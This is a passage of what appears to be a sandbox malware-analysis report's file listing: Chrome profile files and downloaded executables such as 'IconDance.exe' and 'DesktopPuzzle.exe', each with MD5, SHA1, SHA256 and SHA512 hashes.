| SHA1 | 966b25dd20c139d9d6da93481884ebd90c22d1c1 |
| SHA256 | 408de90fc65616be1831a88be045278b7ade84bb5ca0acfb447ba7bd05c16604 |
| SHA512 | 1b6fa40e593bac17d490d401e54a0e6d133e3266939515be7d6d6c3641857bc6ce7b72f18d1900cf40a74ccf5033ebbc4aafaffc370c41057c6993a030b9ba0c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 9417735d243181d7ab132f035f14ebd7 |
| SHA1 | 835c343b8c431a8b880ef1823172f57938a4775a |
| SHA256 | f0b313fdf70288e5c8c5d6ef00d5fa441d99c2907695aad7f1c447e86d3759d1 |
| SHA512 | c20a8a941d993bb3a0e60a30001ca19151bef5d3d117cb83473a8259526319ea4825038828c880b3aed8ca1fae84145148070eb184bff405b37ef6e1f67bfe50 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | fb155025ebfdb8848ab4d2754af6497e |
| SHA1 | 9f58b29910d83b2f18c17c44f5803699c85691fc |
| SHA256 | 5549e0b6165109231e009de61a725442792abac3f45f2bf812446f7074900f0f |
| SHA512 | 45aaa05e97f67f7eec2f07146aa3b06add45582164c6caef5e1b7eff2c6df9d65226a27e26f3f31b14708fc9607bdd204851ff81079b8a94ed673ebbe592b94c |
C:\Users\Admin\Downloads\Unconfirmed 130762.crdownload
| MD5 | c67dff7c65792e6ea24aa748f34b9232 |
| SHA1 | 438b6fa7d5a2c7ca49837f403bcbb73c14d46a3e |
| SHA256 | a848bf24651421fbcd15c7e44f80bb87cbacd2599eb86508829537693359e032 |
| SHA512 | 5e1b0b024f36288c1d2dd4bc5cf4e6b7d469e1e7e29dcef748d17a92b9396c94440eb27348cd2561d17593d8c705d4d9b51ae7b49b50c6dee85f73dec7100879 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | ac8ad0fe198a7873e6451dd7bef62402 |
| SHA1 | 80323e408e3606c1997e91a6a214250e0cdcd133 |
| SHA256 | 8145e1f9b607d2b72168ec4af172d81471022443617da26dc203a6513d3e0f27 |
| SHA512 | 26f8f90a1128a577bc52416321d829cdcf01b17662647326b6d77e63f64ce35886659e3e0a2d6c9a5ecf19458efa2e9bf262b750e00b2763278df95092911c1b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\8704ffe1-ecdb-4eed-927f-013931a4f798.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 6ab0b220b253895d98d72dabd1b34db5 |
| SHA1 | 01deb279f2e1551862d1e0b4a5eecdca20d6bea7 |
| SHA256 | d2483cf049e0b6213d3c8a469693280b4190098c5a14ef8ce848c601b644348c |
| SHA512 | f4d85a541c18deef1f0a103c527393b4be8aea18ba1c7343774055bdbde24436515088c482a71e264586cc2f376bc79e239845e64e2bcc0dcce56b9bc0143cc7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 9dd34f87933266990ffeaf623fafc7fe |
| SHA1 | 77ba890df197311eb49e4dec8cf101f142910086 |
| SHA256 | c067fe7e751d46ef3eb435f51646f48e67c654e7ceebe98414fd94324e19a8b8 |
| SHA512 | 5101dcea0db72b205b8d1baa62c61975cb9ed5551ecb85a05d39362a70c5d3bce5e4861dbd57bcc3493988636ddbdc80f7a5812821395ada116d9bd1464718e1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 11567c3c4a8362e6b63749bf1c025106 |
| SHA1 | c8fff0ddedb755aec5456037d87173fe3ea1a604 |
| SHA256 | 85fc76d006030977cb9e103feec58a6d709aa46d68e02469ceaa93797ae567f2 |
| SHA512 | 644067804944c50026d0f277d4a1db95021f6941f8ff9e58ef1479ba9b1bf7909600eb173924c0f3036daed97501af137e8b5eb8a064e36a06ff22a59279d6e9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | fdd33d6b854f74d587a7ef084d92530e |
| SHA1 | 417b5f964ebf6bd09c32ad5e5fd518a92e0b8091 |
| SHA256 | 87673767b6e4dc48f81963c987b7f8281717f63865069374a1e82987c623c40c |
| SHA512 | f8940aa29d36973aad9936f188f9a3a12842b31da635822fd17eaa3a64357799b2c2727a3cecc008b14db2c95f9878b204afd0295a0279dced63e6126f70fe4e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 54c826ca4427d2cc85c6c5e44f543664 |
| SHA1 | 639bb3736e5ffdf25741f7d2f14a8416e5cac2ec |
| SHA256 | c5bd06187e46346dca6b1007b401f9ef95613c7cbd1d358e36b6e2e75ddb18e1 |
| SHA512 | 958e5a82d27dfadd68cfcf626bad2e47d77c45b8cd784b32a64159118a63f071f6224a19ff83804f84c177169021179cb4bf7f77d0e496c3124e77f323958b7a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 94a3ec35c6145d33efa58bf63aa446f3 |
| SHA1 | 61788e8f82dcd126a69b46597a82796241a3d9cd |
| SHA256 | 865d3076fbb34e7f20c86d8eee5acc6c1d8f94e231fcc589b75ac0e586dbc77c |
| SHA512 | 351bee74ffafb504b76faf02e565af9de5ba1e18e78dd9bc089460dfd115a0af75c0e651f921207e21b28f1b18b7f076c258ef913e9b86d99212baaaabcddb23 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 2419a19ce81288e4af16fce4572815a4 |
| SHA1 | 6b4e313b62bdd6372eb5080cb18fe019f7d061b9 |
| SHA256 | f96458ee37267fe6179fa34c5c8a84c42ac02877f8299a82d24be0c645bf15dc |
| SHA512 | 0a8eda8d066ac89abf35dc993aa8600160216e90f1b7652f715afb88bc582b09387948be9e47ec4a4ee0f4a64edbe51c8503e45423be1e39d7b6156a2a6e3b8d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 7c1ea103f4e1af911418a9386c06dfe4 |
| SHA1 | 0aa3bcc19ea30d5c4c5db666ef6fda9f36885f6b |
| SHA256 | d7c9d9692f1be643a505e7033e82e8daa7cab9d1475eb8190ff2f9bf86598b10 |
| SHA512 | 579f99d217e39332ce4d723f1d02a19b6fe722f5054ec448ce26666b2b29e475facdf730fb305587f72e43d311fe92fa5d6b761857ebcd000e8338bcedafcaee |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 211b9fecaba0b8a5b61b509dad147fb3 |
| SHA1 | 2d26bda783df2be7a2fccee3b563b5713a60388f |
| SHA256 | f9673b45c6ff8da8ddfb6aae21e39e4d059303fd5570a270e14a9fd27566d700 |
| SHA512 | b0d681fbdf005bb7704509cb14ad5947a7c55e00d121f55ea58311581fd088e910f2f82e1d8075bfec3174ada1c54fdb9fcb7908704c87fd2c1de6541c3c2663 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | b18feab84facaeba5e383e27cfe92e31 |
| SHA1 | 98722ed50f8ef1fa1fcfb46f5b549dd264cd86d9 |
| SHA256 | 79b6292eca5c6214dac4dfb8b10dffd9fa3ed3e37c789f7e5327e4886af14750 |
| SHA512 | 8282eb0847129420f18b1f079595c42882bfb4192d3a0c4f4ccfde4008b777cdcf2bdfbfd3f278301fd178f1d5965548bc195eeb79dd140c971501a3b9da09bf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 5621233bca3c4e8ef7eeeacf45278470 |
| SHA1 | 4f83b9c0374c3166c4b20b3929fb3e3afeb0d4fd |
| SHA256 | cbef86fa94caeb5d3b1aaded83d9db19d2b30758ecc246670c2d3e0df6f8ae3d |
| SHA512 | 71256cd1eac95a3027a2e744474b5cf76ddecc9ab6f1b7a210e585a7c3cc386a41d218466466ecd035b1b9b9f6c1ca30aef23bf015021dfb03c602ab783e9602 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 8ed24316f64b0297af38d2ff60180227 |
| SHA1 | c70abab14772feca321532997e201456597cf440 |
| SHA256 | 2ca462c4adbdc92b3015b7e7f9925fd5f3572785aac35e97260def51a5abe0df |
| SHA512 | 1faa6ac7361dc89ab5ee2b415743876b72e39150e8ccf1006e5a5e4e7f15487dae9368c49e04c31c179c4e4bb26f8215004acfd9f292f3d9b38959524e2d7d2f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 0afa2a4f0ae43fd55ddfd257958fc274 |
| SHA1 | cf2e82ee80ac8d46bfa2a9e8cbade7f508d34c12 |
| SHA256 | 63e29d71990e64e357469704e8e4da97f1d81bc3fab25bb49401eea9bdac6203 |
| SHA512 | 971ad11f8d917b707f5f35d8785d1386b0bbbdc971c25f6fe97aa8efb5d0ac0dc048eedd93ed8bf15cb01e39b71c0797383905c6910322f8ada26760c6838617 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | e669d48a8e00f589ae3b627cf5d18968 |
| SHA1 | ffb12f0f86283dd708a0a92a704cd33e0b1e8259 |
| SHA256 | 0749308de8ed4d3dd94d11b7bca46d617f55723df21e990ee0b5b315db0d8cd7 |
| SHA512 | f6b63a5c87527cd246df4e6f3b76cd1f132e40fd00b770609ba98ad157389492f97afc0570a37df686f9aa166d50cdf20587ca060254b469b7873425d910d65a |
C:\Users\Admin\Downloads\IconDance.exe
| MD5 | 7ad8c84dea7bd1e9cbb888734db28961 |
| SHA1 | 58e047c7abecdd31d4e3c937b0ee89c98ab06c6a |
| SHA256 | a4b6e53453d1874a6f78f0d7aa14dfafba778062f4b85b42b4c1001e1fc17095 |
| SHA512 | d34b087f7c6dd224e9bfe7a24364f878fc55c5368ce7395349ca063a7fd9ac555baed8431bfa13c331d7e58108b34e0f9d84482ce2e133f623dd086f14345adb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | f3ad50c499e573a1342a552885bac44f |
| SHA1 | 401044479c900a1ce05f8e066121e13d1e8bd56d |
| SHA256 | ff27361c9df5faf650e49a659fe889bb7e11e9480e02e93cf8d57ff62e0d5a57 |
| SHA512 | 38ade99f63853b1842dab87a7d6e0c07f598910d236691d0ed80a69e16cb8a073548ae4112d7282f4aac15a56a922a11ee4c6c8106176472e5c22589630bd48d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b537a7386701b6a682c38f6f9155d6a8 |
| SHA1 | 482388553b294be6e4b5c4ebd4ea159490ed4a69 |
| SHA256 | d59933805093fcfdc86cf89a6640a31489bd0c72a2a3ad76e38d53c0c65a46e7 |
| SHA512 | d34bc3138db2886328b4ecf374cf23948000ee78c18d9d755b0c0e3de4e7e3bba3b98b394a70cf9dc77dc402668be14e73d1f859317e5842cf8758ab20e0a302 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 8a21ea0f5169d23e382bdaf8c80a53d9 |
| SHA1 | 578cbbd4f6d46d77c187ec0f868668313e7ceac3 |
| SHA256 | ea30449521dce7108d129fba684db8a0bdacc48486d778dc75edca261971b20f |
| SHA512 | f8af177e697fdb6abcbe1e47726702fc81593fbc9e378fa07bc9b673f5e7f83e6cb6f270f192c21b9635e0921f11fee1f63bcd65a538adb767276be80b5820fa |
C:\Users\Admin\Downloads\DesktopPuzzle.exe
| MD5 | 2f8f6e90ca211d7ef5f6cf3c995a40e7 |
| SHA1 | f8940f280c81273b11a20d4bfb43715155f6e122 |
| SHA256 | 1f5a26f24a2bfdd301008f0cc51a6c3762f41b926f974c814f1ecaa4cb28e5e6 |
| SHA512 | 2b38475550edee5519e33bd18fea510ad73345a27c20f6457710498d34e3d0cf05b0f96f32d018e7dc154a6f2232ea7e3145fd0ed5fb498f9e4702a4be1bb9c8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 79d60ef1007c7e8ca8634a254053b48d |
| SHA1 | 3d67c99f9770bd7f1a4f39c410723b98970528da |
| SHA256 | f0ad3bb5a337bc2fd8272fdee9193918ad8330cd6f5ce56e274b7a3499d94dd0 |
| SHA512 | b9df4ed321033aa251cebdf3a0dedce155c79c34272dfdab4c592f584dff0e2ace746b9eea6c0ebf4b655eb7a8663a4f3ac44b0b51322877a547ec2ed04155e5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | bc5896b7b81771098722a45f7b1fa233 |
| SHA1 | 30743adbc25463369c6d8eeb068c70c20aa10082 |
| SHA256 | ff9d58f126e880096f70ec8bc72ef5642cd8adb9d5d6c69311b36c156dca80be |
| SHA512 | a9e45f8c5ccc4baa606675b2d83bf1f930ac6cd5af224ee1f1cb7da590bbfb4bbf29b9a7465698d0415c59d002132bf9ac9126644721d704c29e819e7beac984 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | ab81685d7e1074f30f04326b8f921029 |
| SHA1 | 097e99fdf9b819e51168f92a769d14ac88a789f8 |
| SHA256 | 90b8df008344bf9a177019af3fd2fb56615a3c90d7c41922af43b1c681415385 |
| SHA512 | 879bc344c5c591ba14cc85542c386deba4fe42b971bbf96f1b5a0e9bb52144ceba97e1319780b38c8ecac45619917847fb23f77a564209f3fbb70531b82da32f |